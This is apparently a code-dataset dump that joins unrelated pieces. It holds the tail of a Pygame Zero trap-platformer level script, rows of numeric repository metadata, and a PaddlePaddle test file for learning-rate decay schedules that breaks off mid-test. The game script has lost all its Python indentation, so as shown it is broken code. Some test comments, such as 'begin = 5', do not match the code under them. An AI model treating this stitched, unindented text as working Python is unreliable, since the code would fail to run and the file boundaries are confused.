platform.name='platform'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(150,300)
platform.name='platform1'
platform.animate_acted=False
platforms.append(platform)
platform=Actor('platform')
platform.bottomright=(150,300)
platform.name='platform2'
platform.animate_acted=False
platforms.append(platform)
bottom=Actor('vertical')
bottom.bottomright=(765,610)
bottoms.append(bottom)
bottom=Actor('vertical')
bottom.bottomright=(830,350)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomright=(800,450)
bottoms.append(bottom)
bottom=Actor('vertical2')
bottom.bottomright=(830,190)
bottoms.append(bottom)
for i in range(4):
bottom=Actor('platform')
bottom.bottomright=(345+i*100,135)
bottoms.append(bottom)
for i in range(4):
bottom=Actor('platform')
bottom.bottomright=(820+i*100,135)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.bottomright=(1300,335)
bottoms.append(bottom)
bottom=Actor('platform')
bottom.bottomright=(1200,335)
bottoms.append(bottom)
#Initialize save points
saves.clear()
save=Actor('saved')
save.bottomleft=(0,BOTTOM)
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(640,449)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(800,90)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='normal'
saves.append(save)
save=Actor('save')
save.bottomright=(1280,BOTTOM)
if save.bottomleft==RESET_POS:save.image='saved'
save.name='end'
saves.append(save)
#Initialize spikes
spines.clear()
#Trap spikes
spine=Actor('spine_up')
spine.bottomleft=(250,610)
spine.points=[]
spine.name="trap1"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(100,640)
spine.points=[]
spine.name="trap2"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(550,610)
spine.points=[]
spine.name="trap3"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_light')
spine.pos=(170,250)
spine.points=[]
spine.name="spine_light"
spine.name="trap4"
spine.animate_acted=False
spines.append(spine)
spine=Actor('final')
spine.bottomleft=(1580,250)
spine.points=[]
spine.name="trap5"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_right')
spine.bottomleft=(750,610)
spine.points=[]
spine.name="trap6"
spine.animate_acted=False
spines.append(spine)
spine=Actor('spine_up')
spine.bottomleft=(1100,610)
spine.points=[]
spine.name="trap7"
spine.animate_acted=False
spines.append(spine)
edge_sample()
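#edge_sample() presumably fills each spine's .points list; the update functions later test those points with player.collidepoint for finer collision checks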
#Initialize player
player.image='player_right'
player.bottomleft=RESET_POS
#Velocity
player.vx=0
player.vy=0
player.staticvx=0#inertial horizontal velocity
player.ay=2#vertical acceleration
#Jumping
player.jumptime=0#consecutive jump count
player.onbottom=True#whether the player is on the ground
#Death
player.death=False
music_played=False
animate_acted=False
#music.stop()
music.play('bgm')
def smyupdate():
global music_played
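#Per-frame update for this level: drop nearby apples to the ground, spin the rotating ones, fire trap-spike animations, then (outside test mode) run spike/apple collision checks and the button/platform logic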
#Traps
for apple in apples:
if apple.name=='normal' and abs(apple.left-player.left)<45 and player.top+20>apple.top:
animate(apple,tween='bounce_end', duration=0.1,pos=(apple.pos[0],BOTTOM-apple.height/2))
if apple.name in ('rotate','center'):
apple.angle+=1
for spine in spines:
if spine.name=='trap1'and player.left-spine.right>80 and player.bottom<=spine.bottom :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=90
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]+900,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
sounds.up.play()
spine.image='spine_left_long'
spine.animate_acted=True
if not test_mode:
#Collision detection
for spine in spines:
if spine.name in ("trap1","trap2") and player.colliderect(spine):
player.death=True
for point in spine.points:
if player.collidepoint(point):
player.death=True
for apple in apples:
if player.colliderect(apple):
player.death=True
for button in buttons:
if player.colliderect(button):
button.image='button_pressed'
button.bottomright=(1280,BOTTOM)
for platform in platforms:
if platform.name=='platform1':
if buttons[0].image=='button_pressed' and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]+160))
platform.animate_acted=True
clock.schedule_unique(recover_platform,1)
elif platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
platform.animate_acted=True
def zymupdate():
global music_played
#Traps
for apple in apples:
if apple.name=='normal' and abs(apple.left-player.left)<45 and player.top+20>apple.top:
animate(apple,tween='bounce_end', duration=0.1,pos=(apple.pos[0],BOTTOM-apple.height/2))
if apple.name in ('rotate','center'):
apple.angle+=1
for spine in spines:
if spine.name=='trap1'and abs(spine.right-player.left)<10 and player.bottom<350 :
if not spine.animate_acted:
animate(spine,tween='accelerate', duration=0.5,pos=(spine.pos[0],spine.pos[1]-1000))
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
spine.image='spine_left_long'
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap3'and player.left-spine.right>80 and player.bottom<=spine.bottom :
if not spine.animate_acted:
spine.angle-=90
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]+900,spine.pos[1]))
spine.animate_acted=True
if not test_mode:
#Collision detection
for spine in spines:
if spine.name in ("trap1","trap2","trap3") and player.colliderect(spine):
player.death=True
for point in spine.points:
if player.collidepoint(point):
player.death=True
for apple in apples:
if player.colliderect(apple):
player.death=True
for button in buttons:
if player.colliderect(button):
button.image='button_pressed'
button.bottomright=(1280,BOTTOM)
for platform in platforms:
if platform.name=='platform1':
if buttons[0].image=='button_pressed' and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]+160))
platform.animate_acted=True
sounds.up.play()
clock.schedule_unique(recover_platform,1)
elif platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
sounds.up.play()
platform.animate_acted=True
def zmxupdate():
global music_played
#Traps
for apple in apples:
if apple.name=='normal' and abs(apple.left-player.left)<45 and player.top+20>apple.top:
animate(apple,tween='bounce_end', duration=0.1,pos=(apple.pos[0],BOTTOM-apple.height/2))
if apple.name in ('rotate','center'):
apple.angle+=1
for spine in spines:
if spine.name=='trap1'and abs(spine.right-player.left)<10 and player.bottom<350 :
if not spine.animate_acted:
animate(spine,tween='accelerate', duration=0.5,pos=(spine.pos[0],spine.pos[1]-1000))
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
spine.image='spine_left_long'
sounds.up.play()
spine.animate_acted=True
if spine.name=='trap3'and player.left-spine.right>80 and player.bottom<=spine.bottom :
if not spine.animate_acted:
spine.angle-=90
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]+1020,spine.pos[1]))
spine.animate_acted=True
if not test_mode:
#Collision detection
for spine in spines:
if spine.name in ("trap1","trap2","trap3") and player.colliderect(spine):
player.death=True
for point in spine.points:
if player.collidepoint(point):
player.death=True
for apple in apples:
if player.colliderect(apple):
player.death=True
for button in buttons:
if player.colliderect(button):
button.image='button_pressed'
button.bottomright=(1280,BOTTOM)
for platform in platforms:
if platform.name=='platform1':
if buttons[0].image=='button_pressed' and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.3,pos=(platform.pos[0],platform.pos[1]+160))
platform.animate_acted=True
sounds.up.play()
clock.schedule_unique(recover_platform,1)
elif platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
sounds.up.play()
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
platform.animate_acted=True
def wgcupdate():
global music_played
#Traps
for spine in spines:
if spine.name=='trap1'and player.left-spine.right>10 and player.bottom<=spine.bottom :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=90
animate(spine,tween='linear', duration=4,pos=(spine.pos[0]+1000,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap2'and spine.right-player.left>3 and player.bottom<=spine.top :
if not spine.animate_acted:
sounds.up.play()
spine.image='spine_left_long'
spine.animate_acted=True
if spine.name=='trap3'and player.height-spine.height<=10 and spine.left<=player.right:
if not spine.animate_acted:
sounds.up.play()
spine.angle-=0
animate(spine,tween='linear', duration=2,pos=(spine.pos[0],spine.pos[1]-900))#slide this spike upward off screen
spine.animate_acted=True
if spine.name=='trap4'and player.right>=(720) and player.bottom>=( 300) :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=90
animate(spine,tween='linear', duration=1,pos=(spine.pos[0]+1300,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap5'and player.right>=(620) and player.bottom<=(100) :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=0
animate(spine,tween='linear', duration=5,pos=(spine.pos[0]-1900,spine.pos[1]))
spine.animate_acted=True
if spine.name=='trap6'and player.right>=(1100) and player.top>=550 :
if not spine.animate_acted:
sounds.up.play()
spine.angle-=0
animate(spine,tween='linear', duration=1,pos=(spine.pos[0]+1000,spine.pos[1]))
spine.animate_acted=True
if not test_mode:
#Collision detection
for spine in spines:
if spine.name in ("trap1","trap2","trap3","trap4","trap5","trap6","trap7") and player.colliderect(spine):
player.death=True
else:
for point in spine.points:
if player.collidepoint(point):
player.death=True
for platform in platforms:
if platform.name=='platform2':
if player.right<platform.right and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='linear', duration=4,pos=(platform.pos[0],platform.pos[1]-600))
platform.animate_acted=True
elif platform.name=='platform3':
if player.left>platform.left and player.bottom==platform.top and not platform.animate_acted:
animate(platform,tween='accelerate', duration=0.5,pos=(platform.pos[0],platform.pos[1]+1000))
platform.animate_acted=True
def endupdate():
global music_played,death_count
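#Ending sequence: keep roughly 100 apples raining from the top of the screen, drop a 'bigapple' about 40 seconds after tic, and let the player jump without limit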
a_num=len(apples)
if a_num<=100:
apple=Actor('apple')
apple.topleft=(random.randint(0,1250),0)
apple.ay=0.5
apple.vy=0
apple.name='normal'
apples.append(apple)
for apple in apples[:]:#iterate over a copy so apples.remove below cannot skip items
if apple.name=='normal':
apple.vy+=apple.ay
apple.top+=apple.vy
if apple.top>720: apples.remove(apple)
toc=time.time()
global death_end
if (toc-tic)>=40:
apple=Actor('bigapple')
apple.bottomleft=(0,0)
apple.name='bigapple'
apples.append(apple)
if not death_end:
animate(apple,tween='accelerate', duration=1,pos=(apple.pos[0],apple.pos[1]+1000))
death_count+=1
death_end=True
for apple in apples:
if apple.name=='bigapple':
if player.colliderect(apple):player.death=True
#Movement
player.jumptime=0#unlimited jumps during the ending
player.left+=player.vx
if player.bottom<=1000:player.bottom+=player.vy#the <=1000 check stops the endless fall after death
init()
pgzrun.go()
| 29.82265
| 199
| 0.60961
| 5,310
| 41,871
| 4.751977
| 0.075895
| 0.039472
| 0.02897
| 0.022193
| 0.820473
| 0.789561
| 0.773194
| 0.74676
| 0.702968
| 0.674395
| 0
| 0.050845
| 0.255021
| 41,871
| 1,403
| 200
| 29.843906
| 0.758087
| 0.016551
| 0
| 0.723366
| 0
| 0
| 0.071213
| 0.001925
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016115
| false
| 0
| 0.004476
| 0
| 0.020591
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 |
35633fbec43078eb5563fb3bccbe2c25c6bb37ca | 38,124 | py | Python | framework_api/test_dy_learningrate_cpu.py | zjjlivein/continuous_integration | c8825f32136fdd425389702c37ded08d6fd28a26 | ["Apache-2.0"] | 14 | 2020-03-04T07:52:07.000Z | 2022-02-14T01:39:14.000Z
| framework_api/test_dy_learningrate_cpu.py | zjjlivein/continuous_integration | c8825f32136fdd425389702c37ded08d6fd28a26 | ["Apache-2.0"] | 19 | 2020-03-04T03:52:10.000Z | 2021-12-23T07:02:07.000Z
| framework_api/test_dy_learningrate_cpu.py | zjjlivein/continuous_integration | c8825f32136fdd425389702c37ded08d6fd28a26 | ["Apache-2.0"] | 26 | 2020-03-04T05:39:09.000Z | 2022-02-14T01:43:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test dygraph learningrate."""
import paddle.fluid as fluid
import numpy as np
import tools
import math
cpu = fluid.CPUPlace()
def test_PiecewiseDecay():
"""
test PiecewiseDecay
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
# basic test
boundaries = [10, 20]
values = [1.0, 0.5, 0.1]
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PiecewiseDecay(boundaries, values, 0),
parameter_list=fc.parameters())
for step in range(30):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1 for i in range(10)] + [0.5 for i in range(10)
] + [0.1 for i in range(10)]
tools.compare(res, exp)
# set step boundaries * 2
boundaries = [20, 40]
values = [1.0, 0.5, 0.1]
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PiecewiseDecay(
boundaries, values, 0, step=2),
parameter_list=fc.parameters())
for step in range(30):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1 for i in range(10)] + [0.5 for i in range(10)
] + [0.1 for i in range(10)]
tools.compare(res, exp)
# set begin=5 => 1*5 + 0.5 *10 + 0.1 * 15
boundaries = [10, 20]
values = [1.0, 0.5, 0.1]
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.PiecewiseDecay(boundaries, values, 5),
parameter_list=fc.parameters())
for step in range(30):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1 for i in range(5)] + [0.5 for i in range(10)
] + [0.1 for i in range(15)]
tools.compare(res, exp)
def test_CosineDecay():
"""
test CosineDecay (cosine decay learning rate)
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
# x = fluid.layers.data(name='x', shape=[3, 7], dtype='float32', append_batch_size=False)
# label = fluid.layers.data(name='label', shape=[3, 1], dtype='int64', append_batch_size=False)
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=3, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(3):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1, 1, 1, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25]
tools.compare(res, exp)
# more epochs
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=10, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
# step = 2 allstep = 20
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=20, step=2, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
# step = 2 allstep = 20
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=20, step=2, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
# begin = 5 allstep = 15
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.CosineDecay(
learning_rate=1, step_each_epoch=20, step=2, epochs=3),
parameter_list=fc.parameters())
for epoch in range(3):
for step in range(10):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.75, 0.75, 0.75, 0.75, 0.75, 0.75,
0.75, 0.75, 0.75, 0.75, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25
]
tools.compare(res, exp)
def test_ExponentialDecay():
"""
test ExponentialDecay (exponential decay)
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5,
staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1.0, 0.7937005, 0.62996054, 0.5, 0.39685026, 0.31498027, 0.25,
0.19842514, 0.15749012
]
tools.compare(res, exp)
# staircase = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 1.0, 0.5, 0.5, 0.5, 0.25, 0.25, 0.25]
tools.compare(res, exp)
# staircase = True, begin = 1: equivalent to using global step + begin
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=1,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 0.5, 0.5, 0.5, 0.25, 0.25, 0.25, 0.125]
tools.compare(res, exp)
# staircase = True, step = 2: equivalent to using global step * 2 + begin
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.ExponentialDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
step=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 0.5, 0.25, 0.25, 0.125, 0.0625, 0.0625, 0.03125]
tools.compare(res, exp)
def test_InverseTimeDecay():
"""
test InverseTimeDecay (inverse time decay learning rate)
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5,
staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1.0, 0.85714287, 0.75, 0.6666667, 0.59999996, 0.54545456, 0.5,
0.4615385, 0.4285714
]
tools.compare(res, exp)
# decay_rate = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1, decay_steps=3, decay_rate=1, staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = []
# decay formula
for i in range(9):
tmp = 1 / (1 + 1 * i / 3)
exp.append(tmp)
tools.compare(res, exp)
# staircase = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 1.0, 0.6666667, 0.6666667, 0.6666667, 0.5, 0.5, 0.5]
tools.compare(res, exp)
# begin = 1
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=1,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [1.0, 1.0, 0.6666667, 0.6666667, 0.6666667, 0.5, 0.5, 0.5, 0.4]
tools.compare(res, exp)
# step = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.InverseTimeDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
step=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
exp = [
1.0, 1.0, 0.6666667, 0.5, 0.5, 0.4, 0.33333334, 0.33333334,
0.2857143
]
tools.compare(res, exp)
def test_NaturalExpDecay():
"""
test NaturalExpDecay (natural exponential decay learning rate)
:return:
"""
with fluid.dygraph.guard(cpu):
seed = 33
np.random.seed(seed)
fluid.default_startup_program().random_seed = seed
fluid.default_main_program().random_seed = seed
classdim = 7
x = fluid.dygraph.to_variable(
np.arange(0, 21).astype('float32').reshape(3, 7))
label = fluid.dygraph.to_variable(
np.arange(0, 3).astype('int64').reshape(3, 1))
label.stop_gradient = True
# basic test
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5,
staircase=False),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * i / 3)
exp.append(tmp)
tools.compare(res, exp)
# staircase = True
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1, decay_steps=3, decay_rate=0.5, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.5 * math.floor(i / 3))
exp.append(tmp)
tools.compare(res, exp)
# decay_rate = 0.3
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1, decay_steps=3, decay_rate=0.3, staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
exp = []
for i in range(9):
tmp = 1 * math.exp(-0.3 * math.floor(i / 3))
exp.append(tmp)
tools.compare(res, exp)
# decay_rate = 0.5 begin = 2
res = []
fc = fluid.dygraph.Linear(
input_dim=7, output_dim=classdim, act='softmax')
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.dygraph.NaturalExpDecay(
learning_rate=1,
decay_steps=3,
decay_rate=0.5,
begin=2,
staircase=True),
parameter_list=fc.parameters())
for step in range(9):
predict = fc(x)
cost = fluid.layers.cross_entropy(input=predict, label=label)
cost.backward()
sgd_optimizer.minimize(cost)
res.append(sgd_optimizer._global_learning_rate().numpy()[0])
# decay formula
